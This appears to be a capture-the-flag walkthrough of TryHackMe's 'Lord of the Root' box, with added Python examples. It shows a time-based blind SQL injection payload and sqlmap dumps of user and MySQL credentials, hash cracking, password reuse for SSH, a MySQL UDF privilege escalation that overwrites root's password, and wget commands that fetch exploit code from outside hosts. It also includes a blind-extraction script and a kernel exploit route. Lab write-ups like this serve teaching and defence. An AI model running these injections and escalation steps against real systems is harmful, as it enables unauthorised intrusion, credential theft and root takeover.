thm-lordoftheroot-nl

NOTICE: (SPOILER!!) If you would like to solve it by yourself, don’t read further.

Today let’s play TryHackMe’s Lord of the Root room at

https://tryhackme.com/room/lordoftheroot

This room can be found on TryHackMe! You will need a subscription to complete this room.


#1 Do your basic reconnaissance. What ports do you see open?
#2 Hmmm, what method is used to reveal hidden ports?
#3 What port is the hidden service on?
#4 Do recon on the hidden service.
#5 Can you somehow obtain user credentials?
#6 What’s the method to exploit the system for privilege escalation called?
#7 Who wrote the message in the flag file in root’s home directory?

Enumeration

E:\PENTEST>nmap -p 1-65535 10.10.31.146
Starting Nmap 7.70 ( https://nmap.org ) at 2020-07-15 10:20 W. Europe Summer Time
Stats: 0:00:20 elapsed; 0 hosts completed (1 up), 1 undergoing SYN Stealth Scan
SYN Stealth Scan Timing: About 28.11% done; ETC: 10:20 (0:00:13 remaining)
Nmap scan report for 10.10.31.146
Host is up (0.033s latency).
Not shown: 65533 closed ports
PORT STATE SERVICE
22/tcp open ssh
1337/tcp open waste

Nmap done: 1 IP address (1 host up) scanned in 28.87 seconds

###Service Enumeration

PORT SERVICE VERSION DETECTION
TCP: 22 SSH OpenSSH 6.6.1p1 Ubuntu
TCP: 1337 HTTP Apache/2.4.7 (Ubuntu)

###HTTP Enumeration

Viewing any 404 page rendered:

(image: the rendered 404 page; the interesting part is in its source)

Inspection of the page source revealed a base64-encoded string which itself decoded to another base64-encoded string plus the hint "Closer!"; decoding twice gives a hidden path:

 
[root:~]# echo "THprM09ETTBOVEl4TUM5cGJtUmxlQzV3YUhBPSBDbG9zZXIh" | base64 -d
Lzk3ODM0NTIxMC9pbmRleC5waHA= Closer!
[root:~]# echo "Lzk3ODM0NTIxMC9pbmRleC5waHA=" | base64 -d
/978345210/index.php

That path (http://10.10.31.146:1337/978345210/index.php) exposed a login form whose username parameter is vulnerable to SQL injection; as the sqlmap run below shows, the injection is time-based blind, so every byte has to be inferred from response delays.

SQLMAP

The following sqlmap commands were used for the SQL enumeration and the database dump.

First, use Burp to intercept the login request and save it as mordor.txt, so sqlmap can replay the exact POST (headers and session cookie included):

c:\SQLMAP>type mordor.txt
POST /978345210/index.php HTTP/1.1
Host: 10.10.31.146:1337
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 45
Origin: http://10.10.31.146:1337
Connection: close
Referer: http://10.10.31.146:1337/978345210/index.php
Cookie: PHPSESSID=epttkhiinqkf5ai8ognr1pbvu0
Upgrade-Insecure-Requests: 1

username=admin&password=123456&submit=+Login+
c:\SQLMAP>
c:\SQLMAP>python sqlmap.py -r mordor.txt --batch --dump --threads 10 --batch
        ___
       __H__
 ___ ___["]_____ ___ ___  {1.2.11.19#dev}
|_ -| . ["]     | .'| . |
|___|_  [)]_|_|_|__,|  _|
      |_|V          |_|   http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 09:32:10 /2020-07-15/

[09:32:10] [INFO] parsing HTTP request from 'mordor.txt'
it appears that provided value for POST parameter 'submit' has boundaries. Do you want to inject inside? (' Login* ') [y/N] N
[09:32:11] [INFO] resuming back-end DBMS 'mysql'
[09:32:11] [INFO] testing connection to the target URL
[09:32:11] [INFO] heuristics detected web page charset 'ascii'
sqlmap got a 302 redirect to 'http://10.10.31.146:1337/978345210/profile.php'. Do you want to follow? [Y/n] Y
redirect is a result of a POST request. Do you want to resend original POST data to a new location? [Y/n] Y
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: username (POST)
    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind
    Payload: username=admin'||(SELECT 0x63724e64 FROM DUAL WHERE 2429=2429 AND SLEEP(5))||'&password=123456&submit= Login
---
[09:32:11] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu
web application technology: Apache 2.4.7, PHP 5.5.9
back-end DBMS: MySQL >= 5.0.12
[09:32:11] [WARNING] missing database parameter. sqlmap is going to use the current database to enumerate table(s) entries
[09:32:11] [INFO] fetching current database
[09:32:11] [INFO] resumed: Webapp
[09:32:11] [INFO] fetching tables for database: 'Webapp'
[09:32:11] [INFO] fetching number of tables for database 'Webapp'
[09:32:11] [WARNING] multi-threading is considered unsafe in time-based data retrieval. Going to switch it off automatically
[09:32:11] [WARNING] time-based comparison requires larger statistical model, please wait..............................  (done)
[09:32:14] [WARNING] it is very important to not stress the network connection during usage of time-based payloads to prevent potential disruptions
do you want sqlmap to try to optimize value(s) for DBMS delay responses (option '--time-sec')? [Y/n] Y
1
[09:32:40] [INFO] retrieved:

[09:33:30] [INFO] adjusting time delay to 1 second due to good response times
Users
[09:34:39] [INFO] fetching columns for table 'Users' in database 'Webapp'
[09:34:39] [INFO] retrieved: 3
[09:34:55] [INFO] retrieved: id
[09:35:27] [INFO] retrieved: username
[09:37:23] [INFO] retrieved: password
[09:39:45] [INFO] fetching entries for table 'Users' in database 'Webapp'
[09:39:45] [INFO] fetching number of entries for table 'Users' in database 'Webapp'
[09:39:45] [INFO] retrieved: 5
[09:39:56] [WARNING] (case) time-based comparison requires reset of statistical model, please wait..............................  (done)
1
[09:40:10] [INFO] retrieved: iwilltakethering
[09:44:28] [INFO] retrieved: frodo
[09:46:02] [INFO] retrieved: 2
[09:46:19] [INFO] retrieved: MyPreciousR00t
[09:50:26] [INFO] retrieved: smeagol
[09:52:16] [INFO] retrieved: 3
[09:52:32] [INFO] retrieved: AndMySword
[09:55:46] [INFO] retrieved: aragorn
[09:57:32] [INFO] retrieved: 4
[09:57:53] [INFO] retrieved: AndMyBow
[10:00:35] [INFO] retrieved: legolas
[10:02:32] [INFO] retrieved: 5
[10:02:48] [INFO] retrieved: AndMyAxe
[10:05:21] [INFO] retrieved: gimli
Database: Webapp
Table: Users
[5 entries]
+----+----------+------------------+
| id | username | password         |
+----+----------+------------------+
| 1  | frodo    | iwilltakethering |
| 2  | smeagol  | MyPreciousR00t   |
| 3  | aragorn  | AndMySword       |
| 4  | legolas  | AndMyBow         |
| 5  | gimli    | AndMyAxe         |
+----+----------+------------------+

[10:06:40] [INFO] table 'Webapp.Users' dumped to CSV file 'C:\Users\jacco\.sqlmap\output\10.10.31.146\dump\Webapp\Users.csv'
[10:06:40] [INFO] fetched data logged to text files under 'C:\Users\jacco\.sqlmap\output\10.10.31.146'

[*] ending @ 10:06:40 /2020-07-15/


c:\SQLMAP>
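Here is an added example (not from the original post) of what sqlmap was doing in the run above: a blind injection through the username field that reads the Users table one character at a time, finding each code point by binary search (about seven questions per character). It uses an in-memory SQLite database with constructed rows copied from the dump, and a boolean oracle (did the login succeed?) in place of sqlmap's SLEEP(5) timing oracle, since SQLite has no SLEEP(); the extraction logic is identical. The table, column and function names are this example's own. The parameterised login next to the vulnerable one shows the fix.

```python
import sqlite3

# Constructed sample data, modelled on the Users table dumped on this page.
SAMPLE_USERS = [
    (1, "frodo", "iwilltakethering"),
    (2, "smeagol", "MyPreciousR00t"),
]


def build_db():
    """In-memory SQLite stand-in for the box's MySQL 'Webapp' database."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE Users (id INTEGER, username TEXT, password TEXT)")
    conn.executemany("INSERT INTO Users VALUES (?, ?, ?)", SAMPLE_USERS)
    return conn


def login_vulnerable(conn, username, password):
    """Builds the query by string concatenation, as the injectable form does."""
    sql = ("SELECT id FROM Users WHERE username='" + username
           + "' AND password='" + password + "'")
    return conn.execute(sql).fetchone() is not None


def login_safe(conn, username, password):
    """Same check with a parameterised query: input can never change the SQL."""
    sql = "SELECT id FROM Users WHERE username=? AND password=?"
    return conn.execute(sql, (username, password)).fetchone() is not None


def boolean_oracle(conn, condition):
    """Answers one yes/no question by injecting it into the username field.

    The injected SQL comments out the password check, so the login succeeds
    exactly when `condition` is true. On the real box sqlmap asked the same
    kind of question with SLEEP(5) and measured latency instead.
    """
    payload = "x' OR (" + condition + ") -- "
    return login_vulnerable(conn, payload, "irrelevant")


def extract_string(oracle, subquery, max_len=64):
    """Recovers the result of `subquery` one character at a time.

    Each character is found by binary search over its code point, which is
    what sqlmap does under the hood for blind injections.
    """
    result = ""
    for pos in range(1, max_len + 1):
        lo, hi = 0, 127
        while lo < hi:
            mid = (lo + hi) // 2
            # Past the end of the string unicode() is NULL; coalesce makes that 0.
            cond = ("coalesce(unicode(substr((" + subquery + ")," + str(pos)
                    + ",1)),0) > " + str(mid))
            if oracle(cond):
                lo = mid + 1
            else:
                hi = mid
        if lo == 0:  # code point 0 means we ran past the end of the value
            break
        result += chr(lo)
    return result


def dump_password(conn, username):
    """Pulls one user's password through the blind oracle."""
    subquery = "SELECT password FROM Users WHERE username='" + username + "'"
    return extract_string(lambda cond: boolean_oracle(conn, cond), subquery)


if __name__ == "__main__":
    conn = build_db()
    print("frodo:", dump_password(conn, "frodo"))
    print("vulnerable login bypassed:", login_vulnerable(conn, "x' OR 1=1 -- ", "?"))
    print("safe login bypassed:", login_safe(conn, "x' OR 1=1 -- ", "?"))
```

Against the real MySQL backend the condition would be written with ORD(SUBSTRING(...)) and wrapped as IF(cond, SLEEP(5), 0), with the request time as the oracle; everything else in extract_string stays the same.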

 

SQLMap Enumerate Databases

The remaining sqlmap commands were run against another copy of the same box, at 192.168.30.140 (the database contents are identical). With --forms sqlmap finds and tests the login form itself instead of replaying a saved request.

# sqlmap -o -u http://192.168.30.140:1337/978345210/index.php --forms --dbs

SQLMap Database Dump

available databases [4]:
[*] information_schema
[*] mysql
[*] performance_schema
[*] Webapp

SQLMap Database Table Enumeration

sqlmap -o -u http://192.168.30.140:1337/978345210/index.php --forms -D Webapp --tables
Database: Webapp
[1 table]
+-------+
| Users |
+-------+

SQLMap Enumerate Columns

 
sqlmap -o -u http://192.168.30.140:1337/978345210/index.php --forms -D Webapp -T Users --columns
Database: Webapp
Table: Users
[3 columns]
+----------+--------------+
| Column   | Type         |
+----------+--------------+
| id       | int(10)      |
| password | varchar(255) |
| username | varchar(255) |
+----------+--------------+

SQLMap Dump Passwords

 
sqlmap -o -u http://192.168.30.140:1337/978345210/index.php --forms -D Webapp -T Users -C id,username,password --dump
Database: Webapp
Table: Users
[5 entries]
+----+----------+------------------+
| id | username | password         |
+----+----------+------------------+
| 1  | frodo    | iwilltakethering |
| 2  | smeagol  | MyPreciousR00t   |
| 3  | aragorn  | AndMySword       |
| 4  | legolas  | AndMyBow         |
| 5  | gimli    | AndMyAxe         |
+----+----------+------------------+

SQLMap Dump mysql.user and Crack Hashes

The same injection point can read the mysql.user table. sqlmap offers to crack the MySQL password hashes with its built-in wordlist, which recovers the MySQL root password (darkshadow); it is needed later for the privilege escalation.

sqlmap -o -u http://192.168.30.140:1337/978345210/index.php --forms -D mysql -T user -C User,Password --dump

SQLMap hash cracking options

do you want to store hashes to a temporary file for eventual further processing
with other tools [y/N] y
[05:03:45] [INFO] writing hashes to a temporary file
'/tmp/sqlmapLg7tgv31954/sqlmaphashes-s2BIJH.txt' 
do you want to crack them via a dictionary-based attack? [y/N/q] y
[05:04:28] [INFO] using hash method 'mysql_passwd'
what dictionary do you want to use?
[1] default dictionary file '/usr/share/sqlmap/txt/wordlist.zip' (press Enter)
[2] custom dictionary file
[3] file with list of dictionary files
> 
[05:04:38] [INFO] using default dictionary
do you want to use common password suffixes? (slow!) [y/N] y
[05:04:43] [INFO] starting dictionary-based cracking (mysql_passwd)
[05:04:43] [INFO] starting 4 processes 
[05:04:46] [INFO] cracked password 'darkshadow' for hash
'*4dd56158acdba81bfe3ff9d3d7375231596ce10f' 
Database: mysql
Table: user
[5 entries]
+------------------+--------------------------------------------------------+
| User             | Password                                               |
+------------------+--------------------------------------------------------+
| debian-sys-maint | *A55A9B9049F69BC2768C9284615361DFBD580B34              |
| root             | *4DD56158ACDBA81BFE3FF9D3D7375231596CE10F (darkshadow) |
| root             | *4DD56158ACDBA81BFE3FF9D3D7375231596CE10F (darkshadow) |
| root             | *4DD56158ACDBA81BFE3FF9D3D7375231596CE10F (darkshadow) |
| root             | *4DD56158ACDBA81BFE3FF9D3D7375231596CE10F (darkshadow) |
+------------------+--------------------------------------------------------+

MySQL Local Privilege Escalation

The password recovered for smeagol (MyPreciousR00t) is reused for his SSH account on port 22, which gives a shell on the box. From there the cracked MySQL root password (darkshadow) opens the classic UDF route: compile raptor_udf2.c into a shared object, copy it into the MySQL plugin directory with load_file() and INTO DUMPFILE, register it as the function do_system(), and run commands with the privileges of the mysqld process, which on this box is root. Two things to note in the transcript: the "already exists" errors are left over from an earlier attempt in the same session (the table and the .so were already in place, so CREATE FUNCTION still succeeds), and the payload used here overwrites root's password with "passwd", which is fine in a lab but is a destructive choice on a real engagement.

smeagol@LordOfTheRoot:~$ wget 0xdeadbeef.info/exploits/raptor_udf2.c
--2015-11-24 00:55:17--  http://0xdeadbeef.info/exploits/raptor_udf2.c
Resolving 0xdeadbeef.info (0xdeadbeef.info)... 213.254.16.4
Connecting to 0xdeadbeef.info (0xdeadbeef.info)|213.254.16.4|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 3178 (3.1K) [text/x-csrc]
Saving to: ‘raptor_udf2.c’

100%[================================================================================================================================>]
3,178       --.-K/s   in 0.02s   

2015-11-24 00:55:18 (203 KB/s) - ‘raptor_udf2.c’ saved [3178/3178]

smeagol@LordOfTheRoot:~$ gcc -g -c raptor_udf2.c
smeagol@LordOfTheRoot:~$ gcc -g -shared -W1,-soname,raptor_udf2.so -o raptor_udf2.so raptor_udf2.o -lc
gcc: error: unrecognized command line option ‘-W1,-soname,raptor_udf2.so’
smeagol@LordOfTheRoot:~$ gcc -g -shared -Wl,-soname,raptor_udf2.so -o raptor_udf2.so raptor_udf2.o -lc
smeagol@LordOfTheRoot:~$ mysql -u root
ERROR 1045 (28000): Access denied for user 'root'@'localhost' (using password: NO)
smeagol@LordOfTheRoot:~$ mysql -u root -p
Enter password: 
Welcome to the MySQL monitor.  Commands end with ; or \g.
Your MySQL connection id is 2193
Server version: 5.5.44-0ubuntu0.14.04.1 (Ubuntu)

Copyright (c) 2000, 2015, Oracle and/or its affiliates. All rights reserved.

Oracle is a registered trademark of Oracle Corporation and/or its
affiliates. Other names may be trademarks of their respective
owners.

Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.

mysql> use mysql;
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A

Database changed
mysql> create table foo(line blob);
ERROR 1050 (42S01): Table 'foo' already exists
mysql> insert into foo values(load_file('/home/smeagol/raptor_udf2.so'));
Query OK, 1 row affected (0.01 sec)

mysql> select * from foo into dumpfile '/usr/lib/mysql/plugin/raptor_udf2.so';
ERROR 1086 (HY000): File '/usr/lib/mysql/plugin/raptor_udf2.so' already exists
mysql> create function do_system returns integer soname 'raptor_udf2.so';
Query OK, 0 rows affected (0.00 sec)

mysql> select * from mysql.func;
+-----------+-----+----------------+----------+
| name      | ret | dl             | type     |
+-----------+-----+----------------+----------+
| do_system |   2 | raptor_udf2.so | function |
+-----------+-----+----------------+----------+
1 row in set (0.00 sec)

mysql> select do_system('echo "root:passwd" | chpasswd > /tmp/out; chown smeagol.smeagol /tmp/out');
+---------------------------------------------------------------------------------------+
| do_system('echo "root:passwd" | chpasswd > /tmp/out; chown smeagol.smeagol /tmp/out') |
+---------------------------------------------------------------------------------------+
|                                                                                     0 |
+---------------------------------------------------------------------------------------+
1 row in set (0.02 sec)

mysql> exit
Bye
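The UDF chain above only works when three things line up: the MySQL account you hold has the FILE privilege (or ALL) so load_file() and INTO DUMPFILE are allowed, secure_file_priv does not stop mysqld from writing into plugin_dir, and mysqld itself runs as root (otherwise do_system() only gets you the mysql account). The following triage script is an added example for this writeup, not part of the original post; it evaluates those preconditions from the output of SHOW VARIABLES, SHOW GRANTS and ps. The sample outputs are constructed to match this box, and the function names are this example's own.

```python
import re

# Constructed sample outputs modelled on the LordOfTheRoot box. On a real
# target they come from (once logged into MySQL with the recovered root password):
#   mysql -u root -p -N -B -e "SHOW VARIABLES WHERE Variable_name IN ('plugin_dir','secure_file_priv','version')"
#   mysql -u root -p -N -B -e "SHOW GRANTS"
#   ps -eo user,comm
SAMPLE_VARIABLES = (
    "plugin_dir\t/usr/lib/mysql/plugin/\n"
    "secure_file_priv\t\n"
    "version\t5.5.44-0ubuntu0.14.04.1\n"
)
SAMPLE_GRANTS = "GRANT ALL PRIVILEGES ON *.* TO 'root'@'localhost' WITH GRANT OPTION\n"
SAMPLE_PS = (
    "USER     COMMAND\n"
    "root     mysqld\n"
    "smeagol  bash\n"
)


def parse_variables(text):
    """Parses the tab-separated output of `mysql -N -B -e 'SHOW VARIABLES ...'`."""
    variables = {}
    for line in text.splitlines():
        if "\t" not in line:
            continue
        name, value = line.split("\t", 1)
        variables[name.strip()] = value.strip()
    return variables


def mysqld_user(ps_text):
    """Returns the account mysqld runs under, or None if it is not running."""
    for line in ps_text.splitlines()[1:]:  # skip the ps header line
        fields = line.split()
        if len(fields) >= 2 and fields[1].startswith("mysqld"):
            return fields[0]
    return None


def has_file_privilege(grants_text):
    """True if the account holds FILE (or ALL PRIVILEGES) on *.*."""
    for line in grants_text.splitlines():
        m = re.match(r"GRANT (.+?) ON \*\.\* TO", line)
        if not m:
            continue
        privs = [p.strip().upper() for p in m.group(1).split(",")]
        if "ALL PRIVILEGES" in privs or "FILE" in privs:
            return True
    return False


def can_write_plugin_dir(variables):
    """Whether INTO DUMPFILE may write into plugin_dir, given secure_file_priv.

    '' (the 5.5 default seen on this box) means unrestricted, 'NULL' disables
    file writes entirely, and a path restricts writes to that directory, which
    only helps the attacker if plugin_dir lives inside it.
    """
    plugin_dir = variables.get("plugin_dir", "")
    sfp = variables.get("secure_file_priv", "")
    if sfp == "":
        return True
    if sfp.upper() == "NULL":
        return False
    return plugin_dir.startswith(sfp)


def assess_udf_privesc(variables_text, grants_text, ps_text):
    """Combines the three checks; 'exploitable' means root via the UDF route."""
    variables = parse_variables(variables_text)
    user = mysqld_user(ps_text)
    result = {
        "mysqld_user": user,
        "mysqld_runs_as_root": user == "root",
        "has_file_privilege": has_file_privilege(grants_text),
        "can_write_plugin_dir": can_write_plugin_dir(variables),
        "plugin_dir": variables.get("plugin_dir"),
    }
    result["exploitable"] = (result["mysqld_runs_as_root"]
                             and result["has_file_privilege"]
                             and result["can_write_plugin_dir"])
    return result


if __name__ == "__main__":
    for key, value in assess_udf_privesc(SAMPLE_VARIABLES, SAMPLE_GRANTS, SAMPLE_PS).items():
        print(key + ": " + str(value))
```

The hardening follows directly from the checks: run mysqld as an unprivileged account, point secure_file_priv at a directory that is not plugin_dir (or set it to NULL), and do not give application accounts FILE or ALL on *.*. Any one of those breaks the chain; all three are absent on this box.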

Root

 
smeagol@LordOfTheRoot:~$ su -
Password: 
root@LordOfTheRoot:~# whoami 
root
root@LordOfTheRoot:~# id
uid=0(root) gid=0(root) groups=0(root)

Root Flag

 
root@LordOfTheRoot:~# cat /root/Flag.txt 
“There is only one Lord of the Ring, only one who can bend it to his will. And
he does not share power.”
– Gandalf

Linux Kernel 4.3.3 (Ubuntu 14.04/15.10) – ‘overlayfs’ Local Privilege Escalation

An alternative route to root that does not need the MySQL UDF. On the victim machine, change to /tmp and fetch linpeas from a Python HTTP server on your attacking machine:

wget http://<your vpn IP>:8000/linpeas.sh

This transfers the linpeas script so you can run it:

chmod +x linpeas.sh

./linpeas.sh

linpeas runs and immediately flags several potential privilege escalation vectors.

TryHackMe wants you to exploit the box using a buffer overflow attack, but I am going to show you how to get root without doing that.

sqlmap identified the OS as Ubuntu, and the MySQL banner (5.5.44-0ubuntu0.14.04.1) pins it to 14.04; a quick search turns up a kernel privilege escalation exploit for that release, the overlayfs exploit at https://www.exploit-db.com/exploits/39166. Download it to your machine, serve it with the same Python HTTP server as before, fetch it onto the victim and run the exploit.

Just like that you have escalated your privileges and are root. Change to the /root directory to capture the flag.

Author – Puckiestyle
